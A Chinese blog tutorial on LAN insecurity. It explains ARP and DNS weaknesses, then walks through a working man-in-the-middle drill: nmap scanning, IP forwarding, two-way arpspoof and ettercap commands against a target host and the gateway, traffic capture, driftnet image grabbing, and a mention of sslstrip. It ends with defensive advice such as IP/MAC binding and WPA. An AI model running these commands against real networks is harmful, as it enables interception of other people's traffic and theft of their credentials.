準(zhǔn)備該文一段時(shí)間了，作為新博客上第一篇文章，甚是費(fèi)心，待各種小伎倆融匯貫通，才敢來賣弄。如熟悉TCP/IP協(xié)議族，則閱讀本文比較輕松，如不然則也無大恙，畢竟本文只是籠統(tǒng)介紹局域網(wǎng)安全。

局域網(wǎng)安全為何如此不堪

首先作幾個(gè)定義，什么是局域網(wǎng)，什么是地址解析協(xié)議，什么是網(wǎng)絡(luò)安全，下面是個(gè)人的理解。

局域網(wǎng)的缺陷

局域網(wǎng)簡稱LAN（Local Area Network），對應(yīng)OSI七層模型的三層以下（一般不含第三層IP層)，兩層交換機(jī)或者共享式集線器組網(wǎng)，該類設(shè)備一般不具有基于IP地址的路由功能，故局域網(wǎng)內(nèi)各節(jié)點(diǎn)間通過MAC地址（網(wǎng)卡物理地址）標(biāo)識和通信，而MAC地址是由各個(gè)節(jié)點(diǎn)自行維護(hù)，這意味著我說我是誰我就是誰，這可能是局域網(wǎng)脆弱的根本因素。

脆弱的地址解析協(xié)議

地址解析協(xié)議之于網(wǎng)絡(luò)通信，相當(dāng)于信號燈系統(tǒng)之于公路交通，是用來指示目標(biāo)和方向的，此一旦混亂，后果可想而知，事實(shí)上呢？

• 地址解析協(xié)議(ARP)，ARP(Address Resolution Protocol)，當(dāng)內(nèi)網(wǎng)節(jié)點(diǎn)間（或者是節(jié)點(diǎn)與網(wǎng)關(guān)間）需要通信時(shí)，ARP解析獲得目標(biāo)IP地址對應(yīng)的MAC地址，通過該MAC地址完成數(shù)據(jù)包發(fā)送。ARP協(xié)議是局域網(wǎng)通信的基礎(chǔ)，ARP協(xié)議是這樣工作的：如主機(jī)B需要給主機(jī)A（IP為192.168.1.100)發(fā)送數(shù)據(jù)，為了知道誰是主機(jī)A，首先主機(jī)B發(fā)送一個(gè)廣播包給網(wǎng)內(nèi)所有機(jī)器“誰是192.168.1.10”，正常情況其他機(jī)器忽略該消息，僅主機(jī)A回復(fù)“俺就是192.168.1.10”，于是通信就可以開始。至于不正常情況就是本文的主題。

• 域名解析系統(tǒng)(DNS)，互聯(lián)網(wǎng)上的設(shè)備通過IP地址標(biāo)識，全數(shù)子組成的標(biāo)識不利于人類記憶和處理，域名的出現(xiàn)改變了這種狀況，那么域名是如何對應(yīng)的IP地址的呢，域名服務(wù)器（DNS服務(wù)器）就是來完成域名和IP地址的互相轉(zhuǎn)換功能。DNS工作原理與ARP類似，區(qū)別是DNS通過指定的DNS服務(wù)器來查詢，DNS服務(wù)器一般是安全的（實(shí)際上電信運(yùn)營商等某些權(quán)威機(jī)構(gòu)也經(jīng)常耍流氓），問題是當(dāng)明文的DNS數(shù)據(jù)包通過不安全的局域網(wǎng)時(shí)，會被篡改。

網(wǎng)絡(luò)安全分類

網(wǎng)絡(luò)數(shù)據(jù)安全或許可分為兩層：數(shù)據(jù)安全和鏈路安全。

• 局域網(wǎng)數(shù)據(jù)安全，數(shù)據(jù)安全理解為數(shù)據(jù)包如果被別人獲取，包含內(nèi)容是否可被查看到，沒有加密而明文傳輸?shù)臄?shù)據(jù)包都是非安全的。如SSl/STL協(xié)議數(shù)據(jù)包是安全的，而HTTP數(shù)據(jù)包一般是非安全的。數(shù)據(jù)包與協(xié)議實(shí)現(xiàn)有關(guān)，與網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)無關(guān)。

• 局域網(wǎng)鏈路安全(PATH)，鏈路即網(wǎng)絡(luò)數(shù)據(jù)包經(jīng)過路線。如果正常通信過程中數(shù)據(jù)包有被非授權(quán)訪問的可能，則認(rèn)為該網(wǎng)絡(luò)數(shù)據(jù)鏈路是不安全情況，因?yàn)閿?shù)據(jù)包有被像嗅探甚至篡改的可能。交換型局域網(wǎng)正常情況是鏈路安全的（網(wǎng)關(guān)欺騙則是非正常情況）；共享式組網(wǎng)的局域網(wǎng)默認(rèn)下就是鏈路不安全，該情況下數(shù)據(jù)包按廣播方式發(fā)送，同網(wǎng)段內(nèi)任一節(jié)點(diǎn)都可以收到包。

安全形勢到底有多嚴(yán)重

廣域網(wǎng)可以看作是一個(gè)大局域網(wǎng)（如大中國局域網(wǎng)），其組織結(jié)構(gòu)與局域網(wǎng)有類似，但也不同，廣域網(wǎng)構(gòu)建在IP協(xié)議之上，因此它的安全性相對更好(除非你是電信內(nèi)部人士，可以通過控制骨干網(wǎng)關(guān)鍵網(wǎng)絡(luò)設(shè)備，代表如上海有線通用戶經(jīng)常被運(yùn)營商網(wǎng)頁彈窗騷擾；或者你有特殊權(quán)限可以直接接觸到國家骨干網(wǎng)設(shè)備，這些控制權(quán)普通用戶一般很難獲得。)，而局域網(wǎng)中因?yàn)锳RP協(xié)議的缺陷（不僅是ARP，應(yīng)該是整套機(jī)制），導(dǎo)致局域網(wǎng)中很容易實(shí)現(xiàn)對網(wǎng)絡(luò)流量的操控，局域網(wǎng)中典型的攻擊模式大概是這樣：

1. 第一步先攻擊安全鏈路以獲得數(shù)據(jù)包訪問權(quán)，如通過ARP欺騙或者DNS欺騙方式改變正常數(shù)據(jù)包傳輸鏈路；
2. 第二步數(shù)據(jù)包協(xié)議分析，使用抓包軟件抓取和分析數(shù)據(jù)包內(nèi)容，通過數(shù)據(jù)包篡改等多種手段最終達(dá)成攻擊目的。(A)

現(xiàn)實(shí)中貴重物品保存，一會放入保險(xiǎn)箱（內(nèi)容加密），二放在隱蔽的位置（鏈路隱藏），這樣小偷一來發(fā)現(xiàn)不了，二來即使發(fā)現(xiàn)保險(xiǎn)箱沒有密碼也無法打開，故這種方式相對安全。而這該死的局域網(wǎng)內(nèi)，你的數(shù)據(jù)包一內(nèi)容沒有加密，二位置也沒有隱藏，何來安全呢？

不消說掌握高超技術(shù)的大牛，就是僅會簡單使用幾個(gè)黑客工具的小菜鳥哥，都能在出租房內(nèi)盜取幾個(gè)MM的QQ空間賬號密碼什么的。

局域網(wǎng)通信模型圖示:

幾種常用黑客工具

工與善其事，必先利其器。

Wireshark(抓包利器)

Wireshark（前稱Ethereal）是一個(gè)網(wǎng)絡(luò)封包分析軟件。網(wǎng)絡(luò)封包分析軟件的功能是擷取網(wǎng)絡(luò)封包，并盡可能顯示出最為詳細(xì)的網(wǎng)絡(luò)封包資料。Windows下通過Download頁面下載安裝即可，一般主流Linux發(fā)行版官方軟件倉庫已經(jīng)集成該軟件，可直接安裝：

$ sudo apt-get install wireshark       #Ubuntu
$ sudo yum install wireshark           #Fedora/Redhat 默認(rèn)wireshark運(yùn)行需要root權(quán)限，忽略警告信息，選擇對應(yīng)的網(wǎng)絡(luò)節(jié)點(diǎn)開始抓包，wireshark提供兩種數(shù)據(jù)包過濾機(jī)制：

• 抓取時(shí)過濾規(guī)則，即不符合規(guī)則的包直接PASS不會抓取；詳細(xì)規(guī)則使用參考CaptureFilters,下面規(guī)則的作用是僅顯示由192.168.1.100發(fā)出或者發(fā)往192.168.1.100的http數(shù)據(jù)包。 host 192.168.1.100 and port 80

• 顯示時(shí)過濾規(guī)則，即所有通過指定節(jié)點(diǎn)的包都抓取，但僅在界面上顯示符合規(guī)則的包，詳細(xì)規(guī)則使用參考DisplayFilters，下面規(guī)則的作用是僅顯示由192.168.1.100發(fā)出或者發(fā)往192.168.1.100的http數(shù)據(jù)包。 (http and ip.dst==192.168.1.100 ) or ( http and ip.src==192.168.1.100)

Nmap（網(wǎng)絡(luò)探測工具和安全/端口掃描器）

Nmap,Linux平臺下歷史悠久且功能強(qiáng)大的網(wǎng)絡(luò)探測工具和安全掃描器，支持掃描指定網(wǎng)絡(luò)內(nèi)主機(jī)列表、掃描指定主機(jī)開放端口列表甚至探測出所安裝操作系統(tǒng)類型。該工具系統(tǒng)默認(rèn)集成（支持在線包管理器直接安裝）。

Arpspoof(ARP欺騙）

ARP欺騙工具，工作原理就是不斷的向目標(biāo)（攻擊對象）發(fā)送ARP數(shù)據(jù)包，包內(nèi)容為“我是XXX，請把發(fā)給XXX的數(shù)據(jù)包發(fā)給我”。安裝方法：

$ sudo apt-get install dsniff

Ettercap(數(shù)據(jù)包嗅探和篡改)

Ettercap，“中間人”攻擊利器，ARP欺騙、DNS欺騙、數(shù)據(jù)包替換等等，十分強(qiáng)大，不可細(xì)說，詳細(xì)使用方式參考手冊（man ettercap)。

$ sudo apt-get install ettercap-graphical

ettercap實(shí)現(xiàn)ARP欺騙方式如下 $ sudo ettercap -i eth0 -Tq -M arp:remote /目標(biāo)IP/ /網(wǎng)關(guān)IP/

Driftnet

抓取經(jīng)過本機(jī)的網(wǎng)絡(luò)數(shù)據(jù)包中的圖片并顯示，同時(shí)支持抓取和顯示音頻文件（來源man手冊），安裝：

$ sudo apt-get install driftnet

局域網(wǎng)典型攻擊演習(xí)

本演習(xí)系統(tǒng)環(huán)境如下：

$ lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 12.10
Release:	12.10
Codename:	quantal

第1步：鎖定目標(biāo)

該步不是必需。使用nmap命令掃描局域網(wǎng)，獲得主機(jī)列表，操作如下：

$ nmap -sP  192.168.1.0/24 * “-sP” 表示使用Ping方式掃描； * “192.168.1.0/24”表示掃描"192.168.1.1-192.168.1.254"這個(gè)網(wǎng)段的所有機(jī)器。

nmap命令掃描結(jié)果僅供參考，也可以嘗試其他參數(shù)掃描，詳細(xì)使用方法參考NmapManual。

第2步：收集信息

該步不是必需。選定目標(biāo)為主機(jī)A(這里假定IP地址為192.168.1.110)，使用命令”nmap 192.168.1.110”可獲得主機(jī)A的詳細(xì)情況，如服務(wù)端口開放情況，操作系統(tǒng)類型等信息。

$ nmap -A 192.168.1.110
Starting Nmap 6.00 ( http://nmap.org ) at 2013-08-12 12:34 CST 
Nmap scan report for 10.3.3.108
Host is up (0.00026s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1.1 (protocol 2.0)
...
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
873/tcp open  rsync       (protocol version 30) 
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

第3步：開啟IP轉(zhuǎn)發(fā)和ARP欺騙

該步僅針對交換式局域網(wǎng)，共享式局域網(wǎng)可以忽略（共享式網(wǎng)絡(luò)只要打開網(wǎng)卡的混雜模式就可以抓取所有內(nèi)網(wǎng)數(shù)據(jù)包），ARP欺騙一般目的是把自己偽裝成網(wǎng)關(guān)，但如果不作處理，當(dāng)被欺騙數(shù)據(jù)包到達(dá)后就會被本機(jī)丟棄（因?yàn)樽约旱降撞皇蔷W(wǎng)關(guān)，還不知道如何處理這類數(shù)據(jù)包），這當(dāng)然是不允許的。開啟IP轉(zhuǎn)發(fā)功能可以解決該問題，IP轉(zhuǎn)發(fā)負(fù)責(zé)把該類數(shù)據(jù)包再轉(zhuǎn)發(fā)給真正的網(wǎng)關(guān)處理，開啟IP轉(zhuǎn)發(fā)的方法(注意使用root操作第二條命令）：

$ sudo su
# echo 1 > /proc/sys/net/ipv4/ip_forward ARP欺騙使用arpspoof命令（開啟雙向欺騙，即同時(shí)欺騙主機(jī)A和網(wǎng)關(guān)）：

$ sudo arpspoof -i eth0 -t 192.168.1.110 192.168.1.1
$ sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.110 - "-i eth0"指定設(shè)備節(jié)點(diǎn)，無線網(wǎng)絡(luò)時(shí)可能是"-i wlan0"； - "-t 192.168.1.xxx"指定欺騙對象，如果不指定該項(xiàng)，則欺騙對象為整個(gè)網(wǎng)絡(luò)（ARP病毒引起局域網(wǎng)癱瘓就是這么干的，操作前需注意)，最后一個(gè)參數(shù)"192.168.1.xxx"指偽裝目標(biāo)。

上面第一條命令告訴主機(jī)A(192.168.1.110)，我是網(wǎng)關(guān)(192.168.1.1)，第二條命令告訴網(wǎng)關(guān)，我是主機(jī)A，故完成雙向欺騙。

第4步：抓數(shù)據(jù)包

該步不是必需。抓包分析只是為了輔助需要（通過分析數(shù)據(jù)包流量情況監(jiān)控攻擊工程，同時(shí)也是深入理解攻擊原理的有效方法），使用wireshark工具抓取所有和主機(jī)A相關(guān)的數(shù)據(jù)包，過濾掉不相關(guān)數(shù)據(jù)包，只抓取主機(jī)A發(fā)出或者發(fā)給主機(jī)A的數(shù)據(jù)包。啟動wireshark:

$ sudo wireshark 選擇對應(yīng)網(wǎng)絡(luò)設(shè)備節(jié)點(diǎn)（一般有線網(wǎng)絡(luò)選擇eth0,無線網(wǎng)絡(luò)選擇wlan0)，開始抓包，在Filter輸入框輸入顯示過濾條件：

ip.addr == 192.168.1.110 回車后應(yīng)該在屏幕上看到已抓取包的列表，現(xiàn)在你可以仍然調(diào)取和分析主機(jī)A上網(wǎng)流量情況。

第5步：收獲果實(shí)

抓取主機(jī)A http流量中的圖片，通過driftnet工具實(shí)現(xiàn)，運(yùn)行下面命令：

$ sudo driftnet -i eth0

篡改主機(jī)A訪問的頁面，通過ettercap工具實(shí)現(xiàn)，ettercap是個(gè)強(qiáng)大的工具，再配合sslstrip，基本可以為所欲為。 ettercap詳細(xì)使用方法請參考man手冊（man ettercap)，這里有一篇文章可以參考一二。

該如何防范

安全形勢如此嚴(yán)重，不得不防啊。但安全總是有成本和代價(jià)的，下面建議供參考。

對于交換式局域網(wǎng)，重點(diǎn)守住兩條： 1. 交換機(jī)端口綁定IP和MAC，完成該步，可以說基本天下太平，這個(gè)一般是網(wǎng)絡(luò)管理員的職責(zé)； 2. 如果第1步無法實(shí)現(xiàn)，在自己的機(jī)器上把網(wǎng)關(guān)IP和MAC地址靜態(tài)綁定。

對于共享式局域網(wǎng),這一般是在家里、街上或者出租房中合伙使用的無線路由器下的網(wǎng)絡(luò)。也是重點(diǎn)守著兩條： 1. 不要隨便連接未知無線網(wǎng)絡(luò)； 2. 管理好自己家里的無線路由器，最好使用WPA加密方式，并定期檢察安全情況。

參考資料

Linux滲透之Ettercap詳解 (較詳細(xì)的ettercap文檔翻譯說明)
Ettercap簡要原理介紹以及使用說明 (Ettercap功能介紹)
用ettercap實(shí)現(xiàn)DNS欺騙實(shí)例
不知不覺賬號密碼被竊:中間人攻擊介紹
通過偽造CA證書，實(shí)現(xiàn)SSL中間人攻擊(附詳細(xì)過程和實(shí)現(xiàn)代碼）
關(guān)于ARP欺騙與MITM（中間人攻擊）的一些筆記（二）